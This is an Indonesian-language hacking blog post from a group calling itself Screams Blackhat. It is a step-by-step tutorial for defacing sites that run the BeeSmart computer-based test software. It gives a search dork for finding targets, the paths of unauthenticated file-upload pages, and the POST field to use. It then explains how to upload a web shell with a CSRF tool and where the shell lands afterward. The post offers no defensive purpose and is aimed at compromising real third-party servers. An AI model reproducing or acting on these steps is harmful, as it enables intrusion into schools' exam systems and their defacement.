Deface PoC Computer Based Test With CSRF
Hai, kembali lagi bersama saya Darkness di blog kami Screams Blackhat.
Kali ini saya akan memberikan tutorial Deface dengan PoC CBT with CSRF.
Bahan - Bahan :
Dork :
inurl:login.php intext:beesmart
*kembangkan lagi dorknya
Exploit :
http://site.com/panel/pages/upload-file.php
http://site.com/[path]/panel/pages/upload-file.php
http://site.com/panel/pages/upload_gambar.php
http://site.com/[path]/panel/pages/upload_gambar.php
CSRF :
POST :
uploadfile
Shell :
Download Disini.
Akses Shell :
http://contoh.com/images/shell.php
http://contoh.com/[path]/images/shell.php
http://contoh.com/pictures/shell.php
http://contoh.com/[path]/pictures/shell.php
Live Target :
Langkah - Langkah :
Dorking terlebih dahulu menggunakan dork yang telah saya sediakan di atas, jangan lupa untuk mengembangkan dorknya lagi, agar dapat web banyak.
Setelah dapat target, masukkan exploitnya yang telah saya sediakan juga di atas.
Contoh :
Jika webnya vuln maka akan blank, seperti ini :
Nah jika sudah mendapatkan target yang vuln, kalian langsung saja ke tools CSRF nya, Disini
Masukkan target kalian beserta exploitnya, POST file kalian isi dengan "uploadfile" tanpa tanda kutip. Lalu klik Kunci Boss
Setelah target terkunci, bagian file isi dengan shell kalian, lalu klik Upload Gan. Nah jika berhasil maka akan ada tulisan success, seperti ini :
Setelah itu kalian tinggal akses shell kalian di http://contoh.com/images/shell.php , atau kalian bisa melihat letak shellnya di atas.
Sekian yang bisa saya sampaikan, semoga tutorial ini bisa berguna bagi kalian, terimakasih.
0 Komentar
Posting Komentar